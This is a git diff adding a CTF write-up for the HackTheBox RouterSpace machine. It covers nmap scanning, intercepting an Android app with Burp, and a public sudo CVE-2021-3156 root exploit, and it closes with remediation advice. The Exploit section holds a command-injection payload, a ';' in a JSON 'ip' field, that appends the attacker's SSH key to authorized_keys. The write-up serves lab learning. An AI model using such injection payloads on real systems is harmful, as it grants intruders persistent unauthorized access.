add: writeup-ctf

content/writeup-ctf/writeup-routerspace-htb/index.md

@@ -0,0 +1,134 @@
+---
+title: "Writeup - RouterSpace (HTB)"
+date: 2022-04-05
+slug: "writeup-routerspace-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [RouterSpace](https://app.hackthebox.com/machines/RouterSpace) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.129.175.15
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port
+- 80/tcp : HTTP web server
+
+Let's go to the site and see if we can find some information.
+
+![](img/image-2.webp)
+
+The site presents us with an application to connect our router to "routerspace". In addition to this information we have the possibility to download the application in .apk format.
+
+## Exploit
+
+I first tried to analyze the application with [APKtool](https://www.kali.org/tools/apktool/). But I didn't find anything special. So I will try to install it with the help of an emulator.
+
+After testing several emulation solutions, I finally chose Anbox. To install it on kali I followed the following guide:
+
+[How to install Anbox on Debian](https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd)
+
+After starting Anbox, I start Burp in listening mode on all interfaces, then I set adb with the burp proxy with the following command:
+
+
+```bash
+adb shell settings put global http_proxy 192.168.250.1:8080
+```
+I then install the application with the following command:
+
+
+```bash
+adb install RouterSpace.apk
+```
+After starting the application and testing the connection, I notice that burp is intercepting packets to "<http://routerspace.htb>". So I add this domain to the "/etc/hosts" file.
+
+![](img/image-3.webp)
+
+While analyzing the packet sent by the application I notice a json IP field.
+
+![](img/image-4.webp)
+
+By adding ";" I can insert a command that the remote host interprets as a command. Perfect!
+
+After some tests I realize that I can't launch a reverse shell, possibly there are firewall rules that block. To be confirmed...
+
+Another solution is to use SSH to get access. I check if there is a '.ssh' folder for the user paul :
+
+![](img/image-5.webp)
+
+It exists, so I generate keys:
+
+
+```bash
+┌──(kali㉿kali)-[~]
+└─$ ssh-keygen 
+Generating public/private rsa key pair.
+Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
+Enter passphrase (empty for no passphrase): 
+Enter same passphrase again: 
+Your identification has been saved in /home/kali/.ssh/id_rsa
+Your public key has been saved in /home/kali/.ssh/id_rsa.pub
+The key fingerprint is:
+SHA256:UbAb/Eaflsqf/Wneee+yy26b+ZymMNXYfXH7oxac8/E kali@kali
+The key's randomart image is:
++---[RSA 3072]----+
+|        ...      |
+|       . o       |
+|        = .    ..|
+|         * . o+ =|
+|        S o *o.+o|
+|         o o.= .o|
+|          oo  +.+|
+|           .o=+BE|
+|            +=#&X|
++----[SHA256]-----+                  
+```
+Then I add my public key in the "authorized\_jeys" file with the following command:
+
+
+```bash
+"ip":";echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys"
+```
+I can now connect in SSH and get the first flag.
+
+![](img/image-6.webp)
+
+## Privilege escalation
+
+To start I'll use [linPeas](https://linpeas.sh/) to do a first exploit tracking on the machine. But I have indeed the impression that IPtables rules are blocking my requests:
+
+![](img/image-7.webp)
+
+To transfer my file I will use "scp" with the following command:
+
+
+```bash
+┌──(kali㉿kali)-[~]
+└─$ scp linpeas.sh paul@10.10.11.148:~/ 
+linpeas.sh                              100%  748KB   8.4MB/s   00:00
+```
+After running the script, I notice that the machine uses a version of sudo that is exploitable (CVE-2021-3156). After some research I find this script which allows to create a root shell:
+
+[GitHub - mohinparamasivam/Sudo-1.8.31-Root-Exploit: Root shell PoC for CVE-2021-3156Root shell PoC for CVE-2021-3156. Contribute to mohinparamasivam/Sudo-1.8.31-Root-Exploit development by creating an account on GitHub.![](https://github.com/fluidicon.png)
+
+{{< github repo="mohinparamasivam/Sudo-1.8.31-Root-Exploit" >}}
+
+And indeed after executing the code, I get a root shell and I can recover the last flag!
+
+![](img/image-8.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Secure the application to avoid code injection
+- Run the service with a user who does not have SSH access
+- Update the sudo version to a more secure one